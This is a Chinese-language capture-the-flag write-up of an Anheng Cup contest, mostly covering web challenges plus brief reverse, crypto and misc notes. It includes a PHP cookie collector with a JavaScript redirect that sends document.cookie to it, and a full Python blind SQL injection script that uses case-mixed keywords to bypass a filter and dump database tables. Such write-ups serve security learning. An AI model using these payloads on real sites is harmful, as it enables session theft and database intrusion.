十月安恆杯 writeup
總結說會的正題不難,不會的實在是難的可以…
web1 iphone6
直接將user-agent改成手機的就可以了,很簡單不截圖
web2 jshunt
這個題目我沒有調出來來,但是明顯就是xss,很困惑。
首先掃描了一下目錄發現了tmp目錄和up目錄。up目錄明顯就是我們上傳的jpg檔案,有檔案型別限制,但是沒有 MIME檢查,寫入後是base64加密後的內容。而tmp內容更是直截了當,可以構造<html><script src=></script></html>
最後發現我犯了一個及其2逼的問題
<script>
標籤引用的只能是js,而不是html(因為原來的html用的實在是太多了…)最後是我的編碼的問題…哭暈,本地搭載了一下 flag.php
<?phpif(@$_GET['cookie']){ $myfile = fopen("./1.txt", "a+"); fwrite($myfile , $_GET['cookie']."\n"); fclose($myfile);}?>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
test.html
<html><script src=wamp.html></script></html>
- 1
wamp.html(就是在這裡犯得二)
window.location.href="http://127.0.0.1/flag.php?cookie="+document.cookie
- 1
web3 繞過看門狗
非常簡單的注入,需要大小寫繞過而已,其他都可以繞過了。直接上指令碼吧,比sqlmap好用感覺
#_*_coding:utf-8_*_import hashlib import re,requestsurl = 'http://192.168.5.13/viewld.do?ldid=2%20aNd%20'temp=0def pre(string,pos,l,r): global temp if l>r: return mid=(l+r)/2 tempurl=url+'(seLect asCii(suBstr(('+string+') fROm '+str(pos)+' fOr 1))<='+str(mid)+')' #print tempurl html = requests.get(tempurl).text #print html,len(html) if len(html)>1200: flag=1 temp=mid temp=max(temp,mid) pre(string,pos,l,mid-1) else : pre(string,pos,mid+1,r)flag=''def work(str): global temp global flag for l in range(1,50): temp=0 pre(str,l,30,130) if temp>0 and temp !=30: flag+=chr(temp) print flag else : break#insert="seLect database()" news#insert="SELeCT SCHEma_NaME FRoM infOrmation_schEma.SCHEmaTA liMit 1,1"#insert="SELeCT Table_NaME FRoM infOrmation_schEma.tabLES whEre TAbLE_SChEMA='news' liMit 1,1"#tb_admin tb_flag#insert="SELeCT COLuMN_NaME FRoM infOrmation_schEma.COLuMNS whEre Table_NaME='tb_flag' liMit 0,1"#flaginsert="SELeCT flag FRoM tb_flag liMit 0,1"work(insert)#flag{1396265adbb760c86475304b98e3f61c}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
reverse
這個逆向比較困難,我是投機取巧地找到了原題…但是這個題目是一個非常好的題目,是一個演算法,演算法本身有輪轉等工作,而且有可能有多解,非常好的題目,過一段時間會單獨復現一下。
Crypto
這個我也是迷了,好難猜啊…作業時密文,然後報紙中替換掉的是密文,根據語境猜測替換表是什麼…
Misc 1 別劫持的神祕禮物
大水題,直接在tcp流中找到訪問頁面的包,賬號密碼就在上面,連起來md5一下就好了。
Misc 2 找webshell
這個題目可是坑死我了…一開始像是既然是上傳的檔案,我就去找一下上傳的節點有什麼,發現什麼都沒有,後來一想人家可能藏到了別的地方,用seayfinder沒找到,然後在網上找了一個線上掃描shell的站,但是掃不出來…
下載他的安裝包離線掃掃描出來了,在include/include.php下存在一個pass就是flag了,具體他是做什麼的還沒來得及看,貌似是個大馬,只是根據提示做了出來^_^
總結:
我還是太菜了
再分享一下我老師大神的人工智慧教程吧。零基礎!通俗易懂!風趣幽默!還帶黃段子!希望你也加入到我們人工智慧的隊伍中來!https://blog.csdn.net/jiangjunshow